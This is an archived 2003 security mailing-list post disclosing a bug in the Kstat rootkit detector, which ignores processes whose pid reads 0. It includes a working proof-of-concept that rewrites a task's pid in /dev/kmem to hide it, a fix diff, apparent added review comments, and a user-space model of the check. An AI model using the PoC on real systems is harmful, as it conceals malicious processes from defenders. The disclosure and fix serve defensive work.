

Archive: February 2003 ml@sikurezza.org
Subject: Kstat Bug
From: Dark Angel
Date: 18 Feb 2003 23:58:24 -0000
Kstat has a problem recognizing processes in show_ps, in the file ps.c at line 278:
when it checks the structures in memory, if the pid of the process under examination is equal to 0, it is not considered a possible malicious process.
I attach the fix + proof of concept code.
Greetings to the whole list.

-== Dark-Angel ==-


/*
 * PROOF OF CONCEPT CODE FOR KSTAT by Dark-Angel <dark0@angelfire.com>
 *
 * Change the pid to 0 to hide the process. Change it back BEFORE the program ends, or you'll have a crash
 * Remember to fill #PIDHASH with  cat /proc/ksyms | grep " pidhash" | cut -f1 -d" "
 * Have fun! ^_^
 *
 * Greets to all #phrack.it ppl!
 */

/* Linux 2.4-era code: borrow the kernel's struct task_struct layout,
 * PIDHASH_SZ and the pid_hashfn() macro from <linux/sched.h>, then drop
 * __KERNEL__ again so the user-space headers below are unaffected. */
#define __KERNEL__
#include <linux/sched.h>
#include <linux/types.h>
#undef __KERNEL__

#include <stdio.h>
#include <stdlib.h>             /* atoi, exit */
#include <string.h>             /* strcmp */
#include <fcntl.h>              /* open, O_RDWR */
#include <unistd.h>             /* lseek, read, write, getpid */

#define KMEM "/dev/kmem"
#define PIDHASH 0xfillme        /* address of pidhash[] taken from /proc/ksyms */

void            usage(char *);

int
main(int argc, char *argv[])
{
    int             fd,
                    counter,
                    pid;

    struct task_struct task,            /* copy of the target's task_struct */
                  **az,
                   *tmp,
                   *array[PIDHASH_SZ];  /* copy of the pidhash[] bucket heads */

    if (argc < 3)
        usage(argv[0]);

    if ((fd = open(KMEM, O_RDWR)) < 0) {
        fprintf(stderr, "Cannot open kmem!\n");
        exit(-1);
    }
    /* Read the whole table of pidhash[] bucket heads out of kernel memory */
    if (lseek(fd, (off_t) PIDHASH, SEEK_SET) == -1) {
        fprintf(stderr, "Cannot locate pidhash!\n");
        exit(-1);
    }
    pid = (int) getpid();
    if (read(fd, array, sizeof(array)) < 0) {
        fprintf(stderr, "Cannot read!\n");
        exit(-1);
    }
    /* Hash every pid below our own and read the task_struct at the head of
     * that bucket.  Only the head is examined: a target chained behind
     * another task in the same bucket (pidhash_next) is not reached here. */
    for (counter = 0; counter < pid; counter++) {
        az = &array[pid_hashfn(counter)];
        tmp = *az;
        if (tmp) {
            if (lseek(fd, (unsigned long) tmp, SEEK_SET) == -1) {
                fprintf(stderr, "Cannot locate tasks!\n");
                exit(-1);
            }
            if (read(fd, &task, sizeof(struct task_struct)) < 0) {
                fprintf(stderr, "Cannot read!\n");
                exit(-1);
            }
            /* Target found and it is not the swapper: overwrite the pid
             * field in place (0 makes Kstat's show_ps skip the task). */
            if ((task.pid == atoi(argv[1]))
                && strcmp(task.comm, "swapper")) {
                task.pid = atoi(argv[2]);
                if (lseek(fd, (unsigned long) tmp, SEEK_SET) == -1) {
                    fprintf(stderr, "Cannot relocate!\n");
                    exit(-1);
                }
                if (write(fd, &task, sizeof(struct task_struct)) < 0) {
                    fprintf(stderr, "Cannot write!\n");
                    exit(-1);
                }

                printf("Pid Modified!\n");
                return 0;
            }
        }

    }
    fprintf(stderr, "Cannot find PID!\n");

    return -1;
}

void
usage(char *arg)
{
    fprintf(stderr,
            "Usage: %s PID (to hide) CHANGE (change PID into this)\n", arg);
    exit(-1);
}
73c73
< 	struct task_struct task, taskk, ptaskk, *wow, **ht, htask,*check;
---
> 	struct task_struct task, taskk, ptaskk, *wow, **ht, htask;
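Review bot: the direction of this diff is the reverse of the usual `diff old new` convention: judging by the 279c279 hunk, the `<` lines are the fixed file and the `>` lines are Kstat's original ps.c, so `patch` would apply it backwards unless run with -R. Regenerate it as `diff -u ps.c.orig ps.c`. Also, `check` says nothing about what it holds; since it is compared against task addresses, a name such as `init_task_addr` would make the test in the 279c279 hunk readable on its own.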
93c93
< 	check=(struct task_struct *)kstat_addr=find_kmem_offset(TASK_OFF);
---
> 	kstat_addr=find_kmem_offset(TASK_OFF);
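Review bot: `check=(struct task_struct *)kstat_addr=find_kmem_offset(TASK_OFF);` assigns through a cast, which only works thanks to GCC's cast-as-lvalue extension (accepted by the compilers of the time, removed in GCC 4.0), and the chained form hides that `kstat_addr` is the variable being written. Split it into two statements: `kstat_addr=find_kmem_offset(TASK_OFF); check=(struct task_struct *)kstat_addr;`.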
95c95
< 	
---
> 
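Review bot: this 95c95 hunk is whitespace only (a trailing tab removed from an otherwise blank line) and carries no part of the fix; drop it so the patch shows just the functional changes.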
279c279
< 					if(wow!=check)printf("\nPossible stealth process with pid:%d\tname:%s at %p", 
---
> 					if(htask.pid)printf("\nPossible stealth process with pid:%d\tname:%s at %p", 
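Review bot: the new test has the right shape (exempt only the task that lives at init_task's address, instead of any task whose pid field happens to read 0, which is exactly the field the proof of concept overwrites), but it silently depends on `check` being valid: nothing in the patch verifies that `find_kmem_offset(TASK_OFF)` actually resolved the address, and if `check` holds a failure value then `wow!=check` is true for every entry, the real swapper is reported as a stealth process and the output becomes noise. Add a check on the result of `find_kmem_offset(TASK_OFF)` right after the 93c93 assignment and bail out of show_ps when it cannot be resolved.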
________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List
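The check that the 279c279 hunk changes, as an added example that is not Kstat's code and not the proof of concept posted above: a user-space model in C that builds a 2.4-style pidhash with the kernel's pid_hashfn, hides one task the way the PoC does (its pid field overwritten with 0) and runs the original condition (`if(htask.pid)`) next to the fixed one (`if(wow!=check)`) over every chain. The struct layout, the process table and the `visible` flag standing in for whatever cross-check Kstat really performs are constructed for the demonstration; the real show_ps logic is not on the page and is not reproduced. Unlike the PoC's loop, the walk here follows pidhash_next through each bucket rather than looking only at the head.

```c
/* Added example: model of the pid==0 exemption in Kstat's show_ps.
 * Not Kstat's code; struct layout and process table are constructed. */
#include <stdio.h>
#include <string.h>

#define PIDHASH_SZ 1024                                   /* 2.4 value: 4096 >> 2 */
#define pid_hashfn(x) ((((x) >> 8) ^ (x)) & (PIDHASH_SZ - 1))   /* 2.4 macro */

struct task {
    int pid;
    char comm[16];
    int visible;                 /* constructed: 1 if Kstat's cross-check sees it */
    struct task *pidhash_next;   /* 2.4 pidhash chains buckets through this */
};

/* Constructed process table: the swapper (init_task), a daemon, a backdoor */
static struct task swapper = { 0,    "swapper",  1, NULL };
static struct task sshd    = { 812,  "sshd",     1, NULL };
static struct task evil    = { 1337, "backdoor", 0, NULL };
static struct task *pidhash[PIDHASH_SZ];

/* Insert at the head of the bucket, as 2.4's hash_pid() does */
static void hash_pid(struct task *t)
{
    struct task **head = &pidhash[pid_hashfn(t->pid)];
    t->pidhash_next = *head;
    *head = t;
}

/* Build the table, then overwrite the backdoor's pid with 0 as the PoC does.
 * The task stays in the bucket it was hashed into under its real pid. */
static void build_table(void)
{
    memset(pidhash, 0, sizeof(pidhash));
    swapper.pid = 0; sshd.pid = 812; evil.pid = 1337;
    hash_pid(&swapper);
    hash_pid(&sshd);
    hash_pid(&evil);
    evil.pid = 0;
}

typedef int (*exempt_fn)(struct task *t, struct task *init_task);

/* Original condition: a task whose pid field reads 0 is never reported */
static int exempt_by_pid(struct task *t, struct task *init_task)
{
    (void) init_task;
    return t->pid == 0;
}

/* Fixed condition: only the task living at init_task's address is exempt */
static int exempt_by_address(struct task *t, struct task *init_task)
{
    return t == init_task;
}

/* Walk every pidhash chain; report each non-exempt task the cross-check
 * does not see.  Returns the number of stealth processes reported. */
static int count_stealth(exempt_fn exempt)
{
    int found = 0;
    for (int i = 0; i < PIDHASH_SZ; i++) {
        for (struct task *t = pidhash[i]; t; t = t->pidhash_next) {
            if (exempt(t, &swapper))
                continue;
            if (!t->visible) {
                printf("Possible stealth process with pid:%d\tname:%s at %p\n",
                       t->pid, t->comm, (void *) t);
                found++;
            }
        }
    }
    return found;
}

int stealth_count_original(void) { build_table(); return count_stealth(exempt_by_pid); }
int stealth_count_fixed(void)    { build_table(); return count_stealth(exempt_by_address); }

int main(void)
{
    printf("original check reports %d stealth process(es)\n", stealth_count_original());
    printf("fixed check reports    %d stealth process(es)\n", stealth_count_fixed());
    return 0;
}
```

With the constructed table the original condition reports nothing, because the backdoor's pid field now reads 0 and is skipped exactly like the swapper, while the address comparison still reports it (the swapper itself is exempt in both cases, and sshd is visible). The point to take from the model is that the pid field is attacker-writable data once /dev/kmem is in reach, whereas the address of init_task is not something the rootkit changes by rewriting one integer.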




www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005